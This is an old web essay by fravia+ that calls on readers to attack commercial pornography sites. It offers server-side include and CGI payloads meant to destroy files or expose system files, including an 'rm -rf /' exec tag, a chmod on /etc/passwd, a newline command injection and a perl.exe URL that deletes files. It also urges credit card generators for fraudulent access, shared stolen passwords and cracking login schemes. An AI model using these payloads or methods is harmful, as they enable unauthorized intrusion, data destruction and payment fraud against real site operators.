Searches against Smut
Why should we fight against Smut sites? Are we censors?
~
(A general approach to smut site bombing)
~
By fravia+, Started 1998 ~ Updated May 2000
~
Why should we fight against Smut sites? Are we censors?
We are not censors, and we have nothing whatsoever against nude images (if
given away for free), yet we have to wage battle against commercial smut sites
for many pretty sound reasons. Here the main ones:
Because commercial smut sites are swamping the whole Web. They have swamped, for
instance, the server where my main page was hosted to a point that made impossible
for me to remain there. This swamping may seem strange, since there is NO REASON
whatsoever to use or peruse such commercial smut sites.
As anyone that visit these pages of mine knows, if you have learned how to search
the web there is NOTHING... absolutely nothing that you will not find on the web.
Any application you can think of, any image that has ever been taken or made, any
BOOK that has been written dwells somewhere inside a server on our planet, ready
to be downloaded by you for free.
In such a situation selling "commercially" what is already free is only a
fraud, where 'copyrights' laws are used as fig leaves to cover strong commercial
interests, where all tricks are displayed to deny knowledge for the poors and
the simple ones, all frills and 'push' activities are fostered heavily in order
to keep under their consumistic chains and whips those still unaware of what's
going on, gullible believers in a society where money -and not knowledge- means
power (why?).
Yet this nether world of ours shows a NEW reality: inter alia you can get at, and
download, all the knowledge (and horrors) of the human race. That is, you can, once
you have found them.
The problem and the difficulty is to understand where exactly -and under which
name that what you seek has been stored.
This is fairly easy endeavour, though, (as you have understood on my pages), yet many poor suckers
and lusers simply don't know it, and have -for instance- to pay in order to
get their daily smut ration... don't laugh at them! Imagine you are a frustrated
young man, somewhere in Saudi Arabia, with a web access and enough money and yet
no naked women images (nor many naked real women nor Wodka-Martinis for that matter :-)
nowhere in a range of 1000 kilometers... you would probably fall for it as well...
Since, as you know, on the Web there is NO law, reversers are among the few that can
try to put an end to any activity that they don't like. We decide alone what we allow
and what we forbid, since we HAVE (and spread) real knowledge... the only real "power"
in our worlds of bytes and codes, where commercial minds stamp about blinded by
money... and where we can destroy them, and stamp them out, as I will teach you.
You'll begin to see here how we can attack, and you may decide to join and help (or
even criticize and help... you are not compelled to agree with our course of action,
of course).
The proliferation of these commercial sites is independent of their (mostly poor)
contents, independent from the fact that they are offering images that you could
have for free, since the people that fall for it DO NOT KNOW that, independent
from all moralisation campaigns that, as usual in this awful society, always stop
short of attacking the "holy" commercial activities...
this swamping is simply a consequence of the inner working of these sites,
which you must understand in order to defeat them, and that I will try to summarize
here:
Let's see how a "classical" commercial smut works:
THE WORKING OF A CLASSICAL COMMERCIAL SMUT SITE-
You steal a great number of bad scanned smut images from the newsgroups (where
anybody could get them for free, of course, but that's not the point for you).
- You get an Internic name like xxxsmuttfickxxx.com for a few dollars (you are
already a server provider yourself, or you find one for next to nothing)
- You buy some bad-written cgi-scripts to get a paied access to your smut offerings.
- You realise that almost nobody comes
- You spam every usenet group you can get your hands on in order to get some
idiot to visit your site paying you some money
- You realise that almost nobody comes
- You prepare a real ugly smut image as "banner-ad" and exchange it with one
hundred other smut sites, hoping that the small park of frustrated rich idiots
that roam these sites (and pay for them) will give you some dollars too.
- You realise that almost nobody comes
- You specialise in nastier and nastier smut images ("lolitas swallowing horses"
"pregnant teenagers tortured by lorry drivers" or whatever)
- You swamp whole servers with the same poor images yet with twenty differently
named "entrances" to them.
- You spam and spam and spam and swamp and swamp and swamp
- You realise that most people that seek this kind of images still prefer to get
them for free
- You write the word "free" everywhere in your commercial smut site hoping to
get somehow inside the search engines listings for free smut images.
- You eventually scrap your couple of bucks from your dirty floor and swallow them.
WHAT CAN WE DO AGAINST THEM?
Well, there are some possible line of actions:
Nuke the sites
This is far from easy, and you need some particular conditions to
be able to do it, yet it is great fun. You'll get some hints and
some simple tricks on my "cgi reverse engineering" pages one and two.
Basically you just write something like
#exec cmd="chmod 666 /etc/passwd"
for SSI servers
or add something like the following to the http://www.yoursmuttarget.
com
com/cgi-bin/test-cgi?*
com/cgi-bin/nph-test-cgi?/*
com/cgi-bin/nph-test-cgi?etc/*
or add to your target URL
%0a/bin/ls%20-la%20/usr/src/include
or submit a tag like the following one:
<!--#exec cmd="/bin/rm -rf /"-->
or if the perl.executable is there run it with this URL:
http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
and nuke the smut site for a while :-)
And all this is just to SEE if you can play a little with them (a real
"complete" attack is of course a little more complicated).
VISIT MY cgi reverse engineering PAGE ONE
VISIT MY cgi reverse engineering PAGE TWO
Find and explore the sites
You can easily explore these sites 'jumping' over their password verification
applets or scripts.-
- Download applets or scripts
- Crack them
- Enter
- Find a weak point
- destroy
To find:
VISIT MY how to comb smut sites PAGE
VISIT MY combing and klebing techniques PAGE
To explore:
Use the tricks explained here or just read the robots.txt files (see the
[tips] page).
Don't forget that you don't need to respect smut sites!
Use credit card generators
to get a faked but working credit card number (test it on geocities 'kids' facility until you
find a working one). Once you are inside the smut site, either nuke it or post immediately its
complete subdirectory structure on usenet (even worse: nuking will last only some time, but
re-creating the whole subdir structure can be a hassle :-)
If you don't want to use faked credit card numbes, don't forget that you can also enter smut sites using
FALSE passwords. There are in the warez
scene hundred of sites that offer 'capered' passwords for commercial smut sites,
one of the rare occurrencies where I'm fully favourable to the warez kids.
Million of
frustrated smut-seekers use these free passwords in order to gain access to the
smut sites WITHOUT paying them. This is IMO very good because this does not only
damage the smut sites... in fact most of these simpletons realise in this way very
soon, how bogus all these commercial smut sites are and won't in their life never
come to the idea of paying for access again.
The Commercial smut sites react against password capering with automated scripts that
deconnect all accounts used by two persons on the same time. Yet web server-user
notifications protocols are so unreliable that most of the time they just don't dare
pushing it really too much, and default to a completely useless warning, because
there are
much too many dynamic IDs, and the real fear of these sites is to scare off
one of the few
gullible "correct users" they have got. So everytime you get a "scarecrow" message
visiting
with capered passwords, just reload until it disappears.
You can also enter these sites using gathered 'crumbs' that you'll find on the source
html script of the page. Useful crumb gathering is often possible through right
clicking onto any logo, or image, and carefully watching and registering the URL
call sequence through your logger or personal firewall.
VISIT MY source checking PAGE
Study and crack the friends of your enemies
Many commercial smut sites resort to 'commercial smut verificators', which pay them
'per visit' and take care of the whole verification routines. While this offers a
better security on one site of the medal (good thought
cgi-scripts protections schemes can be certainly tougher than the home-made concoctions),
this means
also that once you have cracked one of these schemes you have cracked all of the sites that
use it.
Beat them at their own game demonstrating that they are utterly useless
There is practically not a single image on the commercial smut sides that
you could not have for free if you cared to. Yet, instead of leaving these
images where only determined people would have found them (why not, if someone
wants to see them, he should be free to do so), the commercial smut sites throw all
these images everywhere on the web, making it dead easy, even for childrens,
to get exposed even if they ARE NOT seeking porn (and since I have
three kids, I know what I am saying... if you want to have a look for yourself
at what kind of smut you can get without any filter whatsoever, visit Giglio's
[third] classroom).
This situation is of course just one of the many nasty consequence of the awful
society where we live in, where everything
is measured only through its 'commercial' value, even people and bodies. Yet
there is no reason we should accept this. Since nuking the commercial smut
sites, while being great fun does not seem to bring us nowhere (there are simply
too many of them and they proliferate like champignons), I am considering writing
simple robots that will "dig out" automatically
all sort of smut images publishing (and updating) these links automatically on
the usenet relevant groups, where part of the suckers that PAY the commercial smut
sites roams. This should damage smut sites where it really
hurts them: on their commercial site :-)
So a good counter-offensive could be to publish on the relevant usenet
groups (say once every week, through an automated bot):-
- either a list of all password capering sites;
- or a list of all the many really free smut sites (which exist but
are fairly difficult to find due to the fraudulent proliferation of
the adjective 'free' inside the commercial smut sites);
- or a list of all the hidden links inside the main smut sites;
- or some cracking / reversing tutorials for the PASSWORD ASKING AND CHECKING applets;
- or some easy robots that would allow any luser to gather whatever
images he (thinks he) needs.
I believe that sending all these info to every warez sites (which are all
concurring against another -for bucks- as well, and would tehrefore immediatly
publish everything you feed them, just in order to gain some more hits :-) would
inflict a more lasting damage to the whole commercial smut scene.
Since the commercial smut sites cannot afford to change continuously the
whole subdirectory naming structure, the publishing of the hidden links and
subdirectories structure could be even more effective that the traditional publishing
of the passwords or the occasional nuking of a couple of exposed site.
We will examine how exactly a userid/password script works, and
how it 'decides' if the user should gain access to the site or not. There
are now some new censorship applications that check THE (rosa) PIXELS of the
images in order to allow or forbid to 'corporate prisoners' to see them.
We could therefore reverse the algorithms of these very censorship appz in order to
obtain the opposite, and
FIND where such images have been hidden. Such a little
bot could then be released for free to the zombies... smut seekers will thus get
for free their smut-dope, automagically brought home, and commercial smut sites
will fail miserably as they deserve... hey! this could be (ahem) very useful against
any sort of commercial site as well, come to think of it :-)
Another very interesting sector is PASSWORD CAPERING. If you have a closer
look at the passwords and userids used by the commercial sites (not only smut
sites) you'll soon realise that they are divided in TWO main categories:
user-chosen and automatically generated.
Both approaches have weaknesses, as we know:
"user chosen" passwords are repetitive, Johnny the bozo cannot remember anything more complicated than
the name 'coke':
fred/fred (look at the letters "fred" on your keyboard)
1111/1111
1234/1234
pamela/pamela
userid/password (ofter that you would think)
That's the reason some commercial site 'assign' you your password:
REDD12JH31/444JAH12@1
99981-2312/RRAE112-43
And as all reversers know, in that case there is nothing easier than crack the algorithms
that assign valid passwords in such a way. Just download the relative applets or, even
more simply, have a quick (reverser :-) look at a small list of valid passwords, that you can
collect at ease from
the many password warez sites.
It is clear that this project will only survive and thrive if there will be
more and more essays from ALL OF YOU and if you will find and send me other
-even better- tricks in order to commercial ruin (or at least to seriously annoy)
all those bastards that run the commercial smut sites.
Some lusers believe that money and sex are the two only things that count in life, and
that 'combining' the two, they may have found an easy way to scrap some easy bucks. Let's
show them that in our world money does not mean anything at all and that even if sex
would really have something to do with poor quality smut images,
which I doubt, that too can be gathered en masse on the web for free, like everything else.
I hope you understand now WHY I want to bust commercial sites (apart from the 'intrinsecal'
fun in busting web sites :-) and WHY this has nothing to do with any censorship attitude of
mine: I am a reverser and a seeker: I want a free web with
free resources for anyone and I'm gonna struggle for it if necessary.
(c) fravia+
Good luck, good hunt!
And if you are interested, here is a small e-mail exchange of your
+truly
with a smut site
(polite) owner.
And if you are interested, here is a
very simple password busting program
(c) 2000: [fravia+], all rights reserved